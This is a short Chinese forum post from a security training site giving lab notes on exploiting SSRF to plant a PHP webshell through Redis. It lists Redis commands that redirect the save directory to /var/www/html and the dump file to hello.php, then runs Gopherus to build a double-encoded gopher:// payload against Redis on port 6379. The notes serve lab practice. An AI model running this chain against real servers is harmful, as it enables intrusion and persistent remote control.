SSRF靶场搭建并利用redis写入一句话拿webshell-女黑客-必火安全学院

女黑客

 找回密码
 立即注册

QQ登录

只需一步,快速开始

SSRF靶场搭建并利用redis写入一句话拿webshell

[复制链接]
发表于 2023-1-31 00:18:56 | 显示全部楼层 |阅读模式
redis-server
redis-cls
set name zhangsan
get name
set age 18
get age
keys *
flushall
截图202301301624354715.png

  1. config set dir /var/www/html
复制代码



config set dbfilename hello.php
set content 'aaa'
save


gopher 协议
apt-get installpython3-pip
python2 get-pip.py

sudo chmod+x install.sh
sudo python2 gopherus.py --exploit redis

gopher://127.0.0.1:6379***
双编码后执行,即可得到webshell





回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|小黑屋|女黑客 |网站地图

© Copyright 2021 版权所有(一极教育科技有限公司)

津ICP备17008032号-3
快速回复 返回顶部 返回列表